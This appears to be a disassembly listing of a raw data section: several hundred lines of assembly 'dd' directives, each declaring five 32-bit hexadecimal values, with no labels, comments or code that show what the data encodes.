dd 5E01B936h, 88E4F556h, 0FE68362Ah, 9BF5587Ch, 2D55FBF4h
dd 0FD407BF6h, 9CC8C357h, 675123C3h, 0E0F8614Fh, 1E4BB48Bh
dd 34F9E89h, 68D9C8BDh, 9AFADE07h, 0C7A0D943h, 0AB45F867h
dd 0B4D348E0h, 2EF82F76h, 63B38A6Ah, 0E87C6717h, 4DBE5E1h
dd 0C4A806DBh, 9725AEDh, 0B0252C0Eh, 9FCD62A8h, 54647Dh
dd 0EA42DCD1h, 0DE1AAC6Dh, 6C35BB8Fh, 656A84B1h, 627AE200h
dd 2BAFD98Ch, 0B42D71B5h, 0B07E0744h, 0D3D8F1F1h, 38796FFh
dd 42C59FCDh, 6F52D022h, 88A2A4ABh, 2D25417Bh, 42FAFC1Ch
dd 9FCD9485h, 58712763h, 39ECB474h, 0EA2A37E1h, 0F0B258F8h
dd 0FC3C56DDh, 9F8565F0h, 0B2EF7E97h, 821B7B57h, 0C0F03D64h
dd 61B8E02Dh, 0DDFCAAD6h, 8BC5EF7Bh, 0CBAF29B6h, 42F03E6Bh
dd 2D462AABh, 79DEFB3Ah, 94AA36E1h, 0C395BD83h, 7B1C4CE0h
dd 79F1F106h, 82AF68A4h, 0E4B55C77h, 1A5BE7EFh, 9DAAC797h
dd 52C90BFCh, 0F04E4615h, 0F9A57C6h, 0E7C65180h, 57B9C807h
dd 9D16CF13h, 0D8ACD6F8h, 7A17CC8Bh, 144658A0h, 2A78BAF8h
dd 1E36F39Dh, 0EF92E260h, 0D5EE188Fh, 58D7BBC7h, 2AADD431h
dd 6BC4C2C2h, 0BD80618Bh
dd 578293ADh, 1C06D511h, 62523EFEh, 3770B386h, 6FA3EE8Ah
dd 29EFBDACh, 38581DA1h, 326A0591h, 75DA8C9Dh, 0F7DC55A9h
dd 27B173D5h, 42F6D5C1h, 0BD02EBE7h, 54970A40h, 0B07C2821h
dd 65470BA5h, 7E315802h, 85BACD73h, 6F4BB025h, 0BB5FA2EFh
dd 6C30423Bh, 50B430BCh, 14B6A597h, 3052D1F2h, 7C106DCDh
dd 0DAD44713h, 0E2A8C4F9h, 0C063A783h, 0A9552BDBh, 7F74F858h
dd 0BE96148h, 0C205E91Eh, 3B5B1012h, 2FC7A959h, 57276FAFh
dd 940A3E8Bh, 0C5B018EFh, 20AA8834h, 4EA85609h, 0FC0CC4Eh
dd 84829224h, 217AF136h, 0E82B6C6h, 0A02BADFh, 7244BBE9h
dd 68E5181Eh, 3D9B3BC3h, 0C597F7D5h, 0E8DF2831h, 7F3CAFFEh
dd 7E076887h, 0DE576136h, 94E1EBA3h, 9EBFBA8h, 0F412BFFEh
dd 0A5DDA5B8h, 4788A528h, 0EC48D694h, 700ED175h, 57A5D487h
dd 0E0B25085h, 0F2F11ABAh, 69F7509h, 0BE4B54FDh, 2F8CCE4h
dd 0F54236F9h, 0EEAB581Fh, 978BBB03h, 95F0784Bh, 3ADBB8D2h
dd 0CD5740CEh, 3B09EB51h, 61BC1CAEh, 19F88FDFh, 8B79DD59h
dd 66E073A4h, 87BDFCC2h, 59B7A041h, 85B3E168h, 0D9DCA842h
dd 0A7F9C0F2h, 0F3315E7Dh, 0A206A967h, 7B366662h, 0D2ADBDBAh
dd 0B3C124D6h, 0C7C64D1Ah, 0A4544BF8h, 76990CC9h, 403E291Dh
dd 0A9C79C15h, 0BFB925ADh, 2588059Eh, 289607EDh, 0F4E7FCFCh
dd 5FDC7A2h, 0BA2E897Fh, 347F1178h, 0F1AC3273h, 26F32DF3h
dd 0F4A36CF8h, 4A0FDDBFh, 20EF35B9h, 60A0BF14h, 0BCB55DF1h
dd 6E51C812h, 3EA2521Ah, 0B411A1ABh, 818DF953h, 98547B0Ch
dd 0DD61053Ah, 0D849075h, 7865224Ah, 1115A7C0h, 16B56D3h
dd 0C654A53Fh, 88968ED6h, 0D75DE42Dh, 0EB70DF2Eh, 555165D7h
dd 2274E780h, 2A4AC1C1h, 0E6C7541Bh, 2FB7CAAEh, 0D2D1BC98h
dd 47E9F02h, 0D3A4E28Bh, 0C3BBA67Bh, 0BE85150Dh, 0AF8218DDh
dd 92D32DC0h, 0BA38F52Ah, 0DD75A25Fh, 7E0CBDFDh, 0F0F7E456h
dd 771AE50Eh, 0CE33D8E4h, 0AF96A97Bh, 7AE5CD12h, 70703E82h
dd 0F16BCC6Ch, 0BFC3DD12h, 0B5AFC6E4h, 3FDF22B0h, 34F2E11h
dd 50703EDCh, 0D05C54B1h, 4E14525Bh, 46FD7AA9h, 0BA5AAAE9h
dd 0C93C8625h, 0E7AC6079h, 1DCA3533h, 8CDF07EFh, 0F00A90BFh
dd 501C4BCEh, 0DB66A103h, 0AF3A3E38h, 0BF7D7CA4h, 1720ADAAh
dd 0DBE8D0F2h, 0EDA7CB3Eh, 2542D1ADh, 0B5029A9Ah, 82C1E696h
dd 868607B3h, 25B242A2h, 27709759h, 3AA9AA98h, 0AA2417C0h
dd 62ABFCC4h, 40862098h, 51F56E61h, 997690C7h, 3ECAB4C1h
dd 14C09493h, 753A5E82h, 33BEB5B8h, 2B2390B1h, 51FB4321h
dd 0F8895404h, 39696A13h, 0A67FE768h, 95CC435Fh, 0C10CC4AEh
dd 9CD862Eh, 0C6086CACh, 3F2BC00Bh, 9D3FE81Bh, 7A156735h
dd 0ED8404D3h, 0C8977238h, 0D7A76668h, 0A66368D4h, 0B73B17C4h
dd 6E87E560h, 0D212AD30h, 8EF01A41h, 0DB1CE225h, 9706AF2h
dd 0E22AD68Bh, 269B9985h, 751EC6B1h, 39BA158Ch, 8AE5CF2Dh
dd 0E443B1B3h, 0DCB4B12Eh, 8FC11B34h, 0E0DD2FF2h, 380FDD5Ch
dd 7220255h, 0DCCE36C1h, 5083AA89h, 8D575426h, 8C38269Fh
dd 29D2E015h, 0F7E043F0h, 72B9C21Ch, 1E12A62Dh, 0B4C39FC6h
dd 5925615Fh, 0A45C9CBBh, 0FE687E3Fh, 952C043Fh, 16EC463Eh
dd 0B2346FC7h, 85AC0F64h, 595686EAh, 0D5BAE5B9h, 7B7BBE31h
dd 648B6F1Ch, 46BAEAD5h, 0DD438905h, 5F5E4C1Ah, 938747A6h
dd 0F7C6142Ah, 8137FB43h, 6E04548Dh, 4F5602C8h, 0DC24C1E2h
dd 7A810C5Bh, 8A8A80AEh, 92520CBAh, 0A781AD2Bh, 4B980DBDh
dd 1D05DBFBh, 2D117DB4h, 8EB6A6EAh, 7DEBE0EBh, 0F581BF07h
dd 27B7ACB6h, 0C4AB715Ah, 19B6FFB3h, 8B8DE74Eh, 74C167FDh
dd 0E56E126Dh, 0B593DD00h, 0B7B7AD76h, 1D0A64EEh, 15B423D6h
dd 8E4E0D46h, 56D8EC0Fh, 0AEC4A985h, 0DC4B11BBh, 0B1AC4C0Eh
dd 0B733E02Eh, 9F96AEDDh, 81BC793Eh, 0E457AB2Ch, 0D7D40F16h
dd 27251447h, 6BD45324h, 0F84E1736h, 0AC32D9B4h, 34057AF5h
dd 0BA9E2FBBh, 688D6085h, 1FEFBFABh, 9EFCB4DCh, 113D9A2Ah
dd 5CE9425Eh, 45E8046Bh, 14E42F4Fh, 0B6B709BDh, 0BF4BBC39h
dd 37166F82h, 9705C6D9h, 0FC9F816Fh, 0C7AC73F5h, 0A8F0566Ah
dd 496F670Ah, 4397B91Ah, 3747E43Ah, 1F894A96h, 256D6B79h
dd 4AB3EDFDh, 7A1D3EBFh, 0C561CBC7h, 0C6543147h, 7A95896Bh
dd 303F1B64h, 0BA924B39h, 0C124E975h, 6CB42F77h, 362D5016h
dd 34B40B44h, 3AB5523h, 57BC2E6Ch, 5B878BBAh, 0BA861DB5h
dd 0B2824EEDh, 7E6830A6h, 40E3735Fh, 8BB80860h, 7FB9FADCh
dd 1740E1ADh, 58A82FD1h, 0C8E435BAh, 0EC80AEAFh, 91B8AAE4h
dd 0FEF54042h, 0DED4D720h, 12D17895h, 578BAE42h, 5F9F7D5Bh
dd 3E282EFh, 0F93AF2FFh, 2D2C7F83h, 1781F545h, 7B2A155Ah
dd 399BC082h, 84E7654Fh, 0B12B908h, 9EDA40B9h, 456D1C2Ah
dd 84B61113h, 0E33598E9h, 7C548FFDh, 0F0699CD8h, 89FFC5FBh
dd 0F9F3ADA5h, 0F42FBA7Ah, 62F861E2h, 109E95A3h, 494E46F3h
dd 0D0DE559Bh, 599D0E2Dh, 2C881478h, 38E19ECFh, 0E6DF4BD3h
dd 6ED504EEh, 0C1A32B7h, 0F1225BA6h, 0EACE54E4h, 3C966439h
dd 0D1D46E6Eh, 48E613F0h, 0FDFEDDFCh, 0BE74067Dh, 547DEC7Bh
dd 4B4956B7h, 0BB457EFDh, 11ECE0EEh, 3D7614BCh, 75EC4FB1h
dd 66DAA4EDh, 9F6F7161h, 0A1939787h, 0FEEB9CA4h, 0E1B99223h
dd 75A5F81Eh, 7F9A9D05h, 0C30B67F6h, 20848FE4h, 6173EA39h
dd 0F9AEB6B1h, 626A96ECh, 0C921F8E2h, 4CD46AB0h, 0A731F025h
dd 2965D370h, 719EFF3Bh, 2E2613E5h, 0F8462F71h, 4B59215Eh
dd 7B64AB7h, 0D9CD8FA0h, 0EC819AA9h, 0CD65FE03h, 6D8E9BECh
dd 67F30807h, 331F1EBh, 0F3734188h, 0F3CE29Ah, 0CC09BB9h
dd 0B8E2685Eh, 8C5FF203h, 1974388Dh, 5A20F9BDh, 36A1D365h
dd 0BB52156Fh, 0B4FA09EEh, 0F72CFB32h, 8B866DD2h, 0D2B86B6Ch
dd 0EE002BB5h, 961C5CC3h, 0AF1FC77Ah, 3084A873h, 2E8562C8h
dd 49F5D9AEh, 8699DA74h, 67BC3F15h, 0B7A7D11Ah, 0EA40B03Eh
dd 3F870209h, 6EC4D548h, 0E15F8DAFh, 6F0B83EAh, 8D28908Ah
dd 44981396h, 0BEA4FB88h, 0ACDF90C1h, 0B02F2BC0h, 4FD2DE2Ch
dd 227EB0C4h, 7C942718h, 6A9D9A4Ah, 5A70567Ah, 5640D7A5h
dd 6D5CE326h, 7C0C4517h, 0F62AD950h, 4032AF54h, 9877C31Bh
dd 6BD0AC6Eh, 8BB2315h, 1B440791h, 0D8A92B51h, 0B67FC2EAh
dd 6924E0D2h, 0F56640A4h, 690D0D69h, 736145C0h, 0A43CE062h
dd 7E6F381Eh, 5B2253Eh, 0FDDA2C37h, 66ED6F9Fh, 6113F11Eh
dd 4BB74C75h, 2C3E7806h, 65F9633h, 38125128h, 7EDC8DA2h
dd 0D3E0DFFh, 0F1E37C3Dh, 871E3CBEh, 24941DECh, 6B2C5FF7h
dd 86A757D5h, 0A52D7741h, 0BA0CAE3Fh, 17A37FBEh, 0AEDC97B9h
dd 9FC4C096h, 0FDB51A02h, 8A94498Dh, 2F3851E3h, 39D7E7DAh
dd 645C6300h, 0B7FB0677h, 0E6E156Ah, 6705FB3Fh, 0DD77834Fh
dd 529BDF8Bh, 0FC3D525Eh, 5F60BF23h, 0F120ADF5h, 8237D1B0h
dd 5E926C1Ch, 0F1A61961h, 0DA86AD16h, 8EA3F0EBh, 185D48A3h
dd 6FDBEEE2h, 0AD7F7620h, 28DA2BEAh, 87416746h, 66F2CE11h
dd 6065D9AEh, 90580FA0h, 73D28E39h, 0CB3A9908h, 73B9D5Ch
dd 3F0FD576h, 4A2D19FEh, 0ED36CA9h, 7ED9DC66h, 472AF785h
dd 0BDDF62FDh, 1F03380Dh, 8CA045F9h, 73EB41EBh, 32C539A0h
dd 44E5C346h, 72C5E102h, 7D8C8F2h, 0C3F8E5h, 0CE7A5DE0h
dd 7EF8DAD0h, 0D9FB9054h
dd 0A19E9ABAh, 3A2594A5h, 4403EC89h, 9456F66Ah, 0CF07C107h
dd 761E6F95h, 6AD1ECBEh, 637BAA2Ch, 1F3DE593h, 4F565938h
dd 0F6FD2DBAh, 65348F93h, 8C0DECC0h, 67703CAFh, 1F87BB06h
dd 78F6BE43h, 0F0D278C0h, 2E2AC749h, 485C4130h, 37390AA4h
dd 2A32DA61h, 2CBFA732h, 59EC7BCCh, 0D20D6F01h, 5D3F2D2Fh
dd 0C51D2FF7h, 0D1F3310Ah, 6F8EFD60h, 5D08A010h, 726E910Ch
dd 93E3180Dh, 3B8F55A3h, 10FB4005h, 0AD4B11E7h, 5E7A89ADh
dd 0CCA8404Ah, 0A740B35Dh, 3D81AC57h, 0BA7E8ED6h, 0A7D1259h
dd 2C8C6322h, 94B52A4Ch, 0A5D2A771h, 30837AFh, 593D0A5Fh
dd 247647D9h, 5D06FCA9h, 0D415531Ah, 5B32C862h, 5A84ECD7h
dd 62752F20h, 1AFBF3E2h, 0C5A87ED4h, 0BF6BDD71h, 2D5D5F17h
dd 0FD560BBDh, 8AC52C3Dh, 0D80E1872h, 0BF980816h, 5A1E25A2h
dd 57E787C3h, 9FC5D313h, 9A72818h, 7C241C62h, 74DE0F01h
dd 727ADCF7h, 8286B6EEh, 47A7DE40h, 0B0EB3DC2h, 706CAA0Ch
dd 464EAAA2h, 4B7C622Ah, 189D9F12h, 826DA5FDh, 9CC698E0h
dd 18DFD5F9h, 0B1E9DF29h, 6F9AD01Bh, 17B8604Dh, 0FA2AD2D9h
dd 572825FBh, 6E175CDAh, 943F1106h, 953B8A79h, 0CC7A2ECEh
dd 5A0CDEF4h, 0FB05F3C0h, 0F9CD74D8h, 62FFBDFCh, 0BA88BF3Dh
dd 5ECCA545h, 5B051A95h, 35DCF547h, 0D6DB4F9Eh, 4CB5787Eh
dd 0FA9F48A8h, 0DEDFB1E4h, 0C2544D0Bh, 0FFF75781h, 0E2EF26B9h
dd 373AC47h, 6670B4D5h, 0F3789EE5h, 0E01769FBh, 9E646FCh
dd 58572013h, 1DD58BB6h, 832BD3F0h, 0B2AA055Ah, 3BA43F01h
dd 1FFE04BFh, 7E5B81FBh, 0F67397EBh, 797E7F37h, 7997FA17h
dd 0E38AC62Ah, 139D50F3h, 3ACA8605h, 67DA1366h, 0EB4B33A6h
dd 65F6D52Bh, 742C43EDh, 939EEA7Ah, 10B5A46Dh, 955E1342h
dd 553B53EAh, 0FE053729h, 0FA49150Ah, 8FC60F90h, 5C031706h
dd 0AFDBA7F9h, 507DAB9Bh, 0D7867860h, 0AB5A2856h, 0D84B15Ch
dd 0EC0DDAE7h, 0BE86A320h, 95C010C6h, 7E676107h, 0CA5D978Ah
dd 8C634514h, 7A6C50ACh, 0BD78B613h, 352B4F47h, 0CE1793h
dd 0F72C4610h, 10FB4578h, 4318991h, 0FB65DECAh, 0EB4ADD37h
dd 0F0651675h, 4F744144h, 0B17C1ACh, 0A9B877B2h, 3C48FB4Eh
dd 1050C975h, 3E47052Ch, 3ACF450Fh, 0BEAC1E8Bh, 2AD558DEh
dd 4F7753B4h, 40C9ED3Bh, 60DBE481h, 28351F2Bh, 0D855E244h
dd 0CB9EDCFEh, 0EB0F6453h, 17130C4Bh, 6A390243h, 0BDFC5588h
dd 0E7186EB9h, 0B1DA952Eh, 7FB2A92Ah, 0A6AADDC1h, 0F02A9E17h
dd 9BBAA121h, 28B255D7h, 0EFE23C04h, 942A992Eh, 685AFE7Eh
dd 0AAC48989h, 0AAFE15EFh, 942E97D6h, 54B31F0Ch, 97B160D3h
dd 0ADDF9FDCh, 6D8B4355h, 0F74D6BF6h, 0B40968A7h, 0BF03375Eh
dd 6FC3FD4Bh, 0DF470CD4h, 676534F2h, 6C1977BDh, 0D288C506h
dd 4930229h, 0C04A8094h, 539883Dh, 0D08A2BA4h, 11903F18h
dd 11574812h, 7114FA80h, 9509AE3Bh, 84C71F11h, 8F3027B9h
dd 0C26608CAh, 7409811Dh, 0E80A2FD6h, 6185E84h, 3023D014h
dd 0F9690F98h, 81518135h, 2809FDC2h, 80A64814h, 88F94185h
dd 3C101618h, 240CE8F2h, 0D81BCC41h, 0A8C09A11h, 8D278D80h
dd 0A8A0AB42h, 9440C082h, 58015982h, 388B3C7Ch, 0B382A8A6h
dd 87A8B7C2h, 0FF3422A3h, 466EA40Ah, 8C09EE2h, 800EE8A4h
dd 0E2E8C28Ah, 709CC07Ch, 79C17487h, 3027B8A2h, 2FA409Ch
dd 90C6F4F4h, 620D1434h, 7518E3D1h, 424D4531h, 354638D1h
dd 86346285h, 432C69F3h, 206A8553h, 798B1D17h, 6CB9DAF6h
dd 0FF757652h, 17913B03h, 0C9C3CF2Dh, 94D87E2Fh, 0B651F605h
dd 4DC7D314h, 0EE7FA7A4h, 0D050ECCAh, 0C3F094D9h, 8071FEB6h
dd 153A882Eh, 0F63FB8BBh, 24921131h, 0E016C7C1h, 43DAB4BBh
dd 185D8FB6h, 0F85305Fh, 2A4C4551h, 8DE9ABh, 0DA97AFE3h
dd 898CE1E6h, 404A4977h, 3D93495Eh, 258B82E5h, 1579332Ah
dd 11546FBCh, 0E6AD5DC0h, 0F570C52Bh, 84C230A7h, 0C73BC22Fh
dd 2A2FC12Dh, 0EA86F784h, 37DF9F39h, 0C0CB79F9h, 9B92FF0Bh
dd 0F74A0BF6h, 1DE77AE6h, 0F761EA22h, 5D23A82Eh, 0E559057Eh
dd 0CA72060Bh, 3B8C3E36h, 8BEC7722h, 4B548FEFh, 16570C63h
dd 5ABB4629h, 0F935BB32h, 0A7E12455h, 6BB17E1Fh, 0B9D606D2h
dd 2D71D46Dh, 9F93EEAAh, 76DF6AAAh, 0EC232AA5h, 436A4D83h
dd 5F865AABh, 4A82C108h, 2F557DBDh, 8942D5Eh, 4ABCFF4Ch
dd 0F6F2DD5h, 0D6D45D84h, 0DAE1CABAh, 0C3D95806h, 0DFA1C7F2h
dd 8039D27h, 0DC0D7E56h, 0E180EC17h, 7C044E67h, 4C596D1Ch
dd 3B2E463Ch, 0AADCD775h, 0F1C3E23h, 0C7EF97E1h, 0FF7FD7E7h
dd 0D87ED3FDh, 70BCD01Dh, 0DBD29BF6h, 0D4D6BB79h, 5031D761h
dd 95D1D117h, 593268E4h, 9CC4D1B6h, 0F2DDE9BCh, 0ED44EBE6h
dd 0ACF9E802h, 2F4F7B89h, 552466CBh, 383CF6EBh, 4FC4C977h
dd 15D3A3B7h, 8573956Dh, 0AB955AE0h, 928F8A64h, 5F49FA8Ch
dd 25A1D9CAh, 0FD768D85h, 357F37DAh, 0EAA02D14h, 0C4C1758Bh
dd 0BC8B3A87h, 855B17F0h, 758B1BCFh, 0A31B4D8Ch, 0B91BC1F6h
dd 0C0F22BD5h, 0A0E3D47h, 0A3778CEEh, 4B8BF830h, 0F4B85581h
dd 48C22525h, 9C6833AAh, 0E7E32A8Bh, 800CEF7Ch, 0EBE7FA43h
dd 0A8A2427h, 12A6CB70h, 0C3DB7E02h, 0BBAD325Fh, 18360F81h
dd 2773C59h, 0DE43B5C0h, 9BF99C84h, 7787A697h, 0AAFE976Ah
dd 0EA02BADFh, 6AF8BA76h, 1FE006D4h, 0DF034209h, 8B8C54EDh
dd 1018D56Bh, 340839FAh, 0A18A81DDh, 0CD5E25C9h, 0C0F6A5DBh
dd 6B64E9BEh, 530821DEh, 5FCC3F01h, 2198AD72h, 703C389Ah
dd 540DA5BAh, 99643B25h, 5A465320h, 0DC2DD39Eh, 292E360Bh
dd 0CAAEAAE7h, 0DA43F073h, 0CEBA926Dh, 0B40ECC6Ch, 0A7B6B4A0h
dd 0AB621689h, 0E6B48BA9h, 0E37BFECEh, 0F0711B42h, 0DFBCCEDEh
dd 0A0668EE2h, 0C3CB434Bh, 18CAF411h, 0E0FA381h, 0D1A6FEFDh
dd 3F1C0DC8h, 0FDE2034Bh, 77906E57h, 95B58F22h, 0BD6CD253h
dd 384AF5Dh, 95670C53h, 0D51E4B82h, 0AB485F0Bh, 0F2A81A8Eh
dd 0E6DA2AF6h, 31C95FEDh, 0A6EE6FDDh, 499EE5AFh, 9C77B75Eh
dd 2BCEFD0h, 0F04FE058h, 49B17FBFh, 3F2704A3h, 97FCD1A6h
dd 156F3B93h, 0F56F16ABh, 2F550AF3h, 0BCD19396h, 0B04A95A3h
dd 9F8B127Eh, 0B425C52Bh, 0AF61C672h, 261C075Ah, 0D3F18D6h
dd 0E123FE54h, 3EFC5827h, 0B79FEF04h, 5E65C370h, 0BE3AACAAh
dd 972CD6D1h, 7C14CCA2h, 834DBC9Dh, 607B047Dh, 0F6DE4AC6h
dd 0E95EB547h, 31B45E62h, 0D8F6B690h, 2BDF5B42h, 8447322Ch
dd 13FD3307h, 7A979E77h, 880A7C99h, 787E3AFDh, 0EF020586h
dd 0CD5F1F28h, 0AE001105h, 1ECD1457h, 71870D1h, 0BB92546Fh
dd 1C0C3FBEh, 3E6294DEh, 0E02844E5h, 28DA3918h, 5845D666h
dd 3EE99A1Dh, 0C2B8CA96h, 0AF8AFDCDh, 7E96464Dh, 0F8E7EC31h
dd 70FC340Fh, 0D4A1E44Ah, 2E3B52A3h, 0F89FDF41h, 4AE6F36Bh
dd 656FB7EDh, 0A9E8BB8Fh, 48EACD68h, 185D8E82h, 0AC913A81h
dd 280739EEh, 0C719FC28h, 4DFD3405h, 7564D251h, 0FC7D1073h
dd 70F514D4h, 7610FF64h, 50FE1A10h, 2CFC7490h, 0B44BA17Ch
dd 0BAE1CC55h, 9FD3DF27h, 0CEDD820Ah, 87C74646h, 0EB83CDADh
dd 98B6D1C1h, 0F2D8272Bh, 0AC194D3Fh, 0DC7A1B71h, 133E8563h
dd 7C28139h, 39449C9Ah, 2089D299h, 2A379EC4h, 0E7154E89h
dd 0F42F8AECh, 0AE7AB139h, 5BA36190h, 54BDB6E5h, 0FA9EF5D9h
dd 963E0C74h, 6A9329C4h
dd 356AB3A1h, 37DA14EBh, 17F965F9h, 56E8997Eh, 179BC71Dh
dd 2EBB5855h, 190FE6F0h, 93571F45h, 0ACF39585h, 0C0FA2CD1h
dd 1BE4B07Dh, 2FA6EE94h, 8517F37Dh, 2446DEDBh, 1C7194D7h
dd 0EFE38A95h, 3B16B0A8h, 0EF5A4AFDh, 84CA95E9h, 0B0F2D5DEh
dd 0D1A0FBE9h, 5CF6FC4h, 786AD42Fh, 0DB6D1497h, 2AC7C87Bh
dd 813C75A8h, 50081E1Ah, 0BF7CDC0Fh, 0BB5E6B39h, 322FF685h
dd 0FDFE1911h, 79088FC3h, 90F6FB60h, 0A289645Bh, 8915FA5Bh
dd 1EE3BDC0h, 41F0B44Dh, 55FA79B7h, 0B8AC0F8Bh, 4346B25Ah
dd 0BEFC2565h, 99C2EA26h, 0D2167F5Bh, 0FC664FFh, 6B125DA9h
dd 2F7A3DF4h, 0B437D9B3h, 0F9EBCE82h, 0F0CE4CAh, 0AD91EAABh
dd 92846EBFh, 0B3EC17F8h, 49AD77DBh, 336F9565h, 300CE28Ch
dd 89F1ED58h, 0F0ED669Fh, 0AFAACEC4h, 0B9CA30F2h, 0A73DBEA1h
dd 0BA81C9BBh, 71BACAC4h, 0F8D57C08h, 0C3581D5h, 0AF6E7BEAh
dd 0E295E4C5h, 2B882783h, 10A49275h, 73381EFDh, 0CBD7CED5h
dd 97E0D1B9h, 1E5787EFh, 97B14A23h, 41334CE9h, 29E79DD9h
dd 38CA5E71h, 344A62BBh, 1358AEDh, 85CA21E2h, 25BF982Bh
dd 5BDE5920h, 0D11D99A5h, 0A8DCC0FDh, 0FC1F0C19h, 55268EF3h
dd 1B973C0Fh, 4691AC85h, 4440B7CFh, 1D7BAAB4h, 6E2FFDD2h
dd 75FC09EAh, 64574582h, 0FBF1DF93h, 66F84877h, 0F17166Bh
dd 14FB195Dh, 6DA6D34Fh, 9D53899Dh, 585D343Eh, 0D6FF2C74h
dd 0BCFAB31Dh, 0EA9D28FCh, 0ADAC5FE8h, 76DD6054h, 9E2C9E00h
dd 207598F1h, 62F1D663h, 0CCF7E6AAh, 22FB9914h, 3F03C95Ch
dd 0AB3EFF9Ah, 8DA29784h, 0C3D95AE1h, 95C0EE0h, 0E7B405DEh
dd 9F4C27EAh, 36BACCEAh, 5A3B4EB7h, 4B7DEB4Bh, 950FC07h
dd 0AA06FA75h, 27557614h, 0BA835DECh, 0EBAFF7F6h, 5A0DDE02h
dd 9F9BC750h, 9CB3C616h, 1A456EC5h, 8177F534h, 77288388h
dd 532308DFh, 2AAA18DFh, 22376229h, 3F46A0Ch, 0C42EDDC5h
dd 2A6F825Ch, 0F8BA9A06h, 9F5D5386h, 7078B1A5h, 0D8BD06F7h
dd 9B614BEBh, 8A4B94AFh, 0D069D201h, 6D9E81E6h, 0AA1F8381h
dd 7A2FA57Ah, 52CF259Ah, 0D14A556Bh, 0A6FA69D5h, 8E6D92Eh
dd 0D86C27D5h, 134B3EE1h, 0E07F517Ah, 7C04FBDCh, 0B6E7EFC0h
dd 0F1CA6F1Ah, 781E983h, 8BC6CA87h, 0A95028E0h, 0D2EBB3BEh
dd 60184E69h, 5B6A7874h, 0BD7003CEh, 0C63D57C5h, 0FE860557h
dd 2150FC4Bh, 0FD1546F7h, 709C2F95h, 798DBF7Bh, 4045CFBCh
dd 957AAFCDh, 1E9FCA6Ah, 0C4E67138h, 0EC6C2FF6h, 0F735FA20h
dd 0B9ACD77h, 850423C3h, 753DD6A6h, 44514030h, 9CA29E93h
dd 52DABC09h, 998CB607h, 0C3E5C254h, 0AD25F872h, 1C056292h
dd 0BF8902E9h, 0CA9F0C2Ah, 8DE9CC85h, 3A9308EBh, 8D82BB35h
dd 9D0BE237h, 4EFEDE28h, 0B90A446Dh, 131A4025h, 0FD7D6BDAh
dd 77E20EC5h, 49C6235Bh, 60B4A062h, 0D759E933h, 0DF4C0FCAh
dd 9399E45Dh, 4BF0BBF6h, 293E0958h, 24A8672Dh, 5219168h
dd 0E25A2B0Ah, 27431224h, 562015FBh, 0FBF1752Fh, 0C60F9540h
dd 85F09768h, 0F535CAECh, 5E8DE079h, 1D355BC6h, 0A8ED78ABh
dd 0FC1E0448h, 0D7B7B34h, 0BD5E578Ch, 0AA53BA01h, 20BAD69Dh
dd 0B397358h, 0C03F92EDh, 0B7CEC3F1h, 0D4F933D8h, 878FF35Ch
dd 29D41DE9h, 0B28B99F8h, 0DCC288AAh, 1BB746B8h, 0E9244191h
dd 67106812h, 86242220h, 8A1D2D58h, 99819834h, 0EAEA55DBh
dd 440F0F4Dh, 0A33C2472h, 39D3CFB0h, 7D676BF6h, 83DA0C67h
dd 0B1D16DA3h, 0B71A0635h, 2E9F1E1Fh, 8FD9F29Ch, 192AD57Ah
dd 98E96561h, 0F8BE33B3h, 90A30845h, 0D2BAC0F0h, 26B8EE16h
dd 0E973EDBBh, 0EAB9609Fh, 0AA780AF8h, 64005DA6h, 0E625DEC2h
dd 80AFBAE2h, 0E23152A8h, 0BAE154EAh, 9BC9B682h, 0EA6DEADh
dd 0C1DA25D8h, 970576EBh, 3635BFC8h, 0B6079103h, 0D84808AFh
dd 9FF4114Dh, 76FF3AB0h, 832FC5F7h, 3362EB76h, 40ABFB86h
dd 43CDF0D7h, 0AA85DC3Dh, 6A1FAD7Ch, 0DF45C38Bh, 777787E2h
dd 6BCA9823h, 4C254AD1h, 1BB14964h, 0D5A11296h, 48D4804Dh
dd 4EF867B6h, 3E1C5F16h, 0BB81F051h, 0FA47A86Ah, 3D90A6BDh
dd 259A6DB5h, 605C7D76h, 8721ACEBh, 83B3FD6Ch, 2FE194EAh
dd 0D0D9CEF3h, 70491FC0h, 94D1FDE6h, 0FAE7F215h, 0BCFA958Dh
dd 5312AD00h, 828DB477h, 0A1EE86E0h, 7E9F4C9Bh, 0FDA86B1Ah
dd 0AC04BCC5h, 0D46B20AEh, 0DBC7078Ah, 0BD1B1492h, 0AF54B290h
dd 44B9AC8Ch, 6ABA3423h, 0CB973C92h, 0CA47AA2Bh, 2A8DCCFAh
dd 0EE06DC66h, 9223568Ch, 0ED29F426h, 69D6078Fh, 0D4E2786Dh
dd 405BA7CCh, 0BFDC07F9h, 0E99940A6h, 5AF6BD60h, 79D6FCBCh
dd 0F36E5F8Dh, 61BDBA95h, 0A4D97355h, 0BDB4287Eh, 0B08BA9Bh
dd 0B8B99C9Dh, 0D80F1DF9h, 5D0E9256h, 4DBFB137h, 0C9F175A3h
dd 1AD1C3B5h, 0CBEE21Ah, 0BECFD8D5h, 65FFBAA2h, 322A0D28h
dd 0EBBFA1Dh, 557FB459h, 4F62A407h, 0BAB91832h, 6067150Ah
dd 2AAA7CDDh, 1EFABF79h, 31969934h, 5171C7F3h, 28A87071h
dd 0D40C4D40h, 0BFC787ABh, 0F4492187h, 0F8A6F1B0h, 5A563C65h
dd 1F412098h, 4179E5B5h, 9C5C1708h, 0FCEB9B7Eh, 707FF636h
dd 6EA9B78Eh, 0A8077F81h, 17512A68h, 83EFDC75h, 3B139997h
dd 3980B33Bh, 0D884CD6Ch, 8B7F9007h, 5ECFB1C2h, 0B1DD9119h
dd 551E5AD1h, 0D77C4B6Dh, 3C60A1A5h, 0FE868167h, 0B5D66F74h
dd 0D96FF827h, 62177E04h, 8859236Fh, 0E21DDACFh, 0AAE33674h
dd 0BE404189h, 0EC024F27h, 0E78B8242h, 0E6744285h, 0A7AFB9FBh
dd 9F8AE071h, 7420202Bh, 0E5C10525h, 564CBC06h, 0D1E5938Dh
dd 2984869h, 6754FEE7h, 5CCA2128h, 3B471CB5h, 9ED1DFA8h
dd 0A772B675h, 969B65BAh, 8DAA43CEh, 1598286Fh, 9507DBCDh
dd 0E74142A5h, 68995B39h, 5E3738EAh, 0AE11400Bh, 0B4AB9F4Dh
dd 0B7E3389Dh, 4BA79C26h, 0F62D10C7h, 2512CCEDh, 0E49BBDCEh
dd 7C565E8h, 0CE3645F9h, 5D8E7543h, 0E85F8589h, 0BBFC616Bh
dd 0BCACDCD8h, 62EF4F8Ah, 0FC2F2AB7h, 0BB92EDh, 0BC8BBBD3h
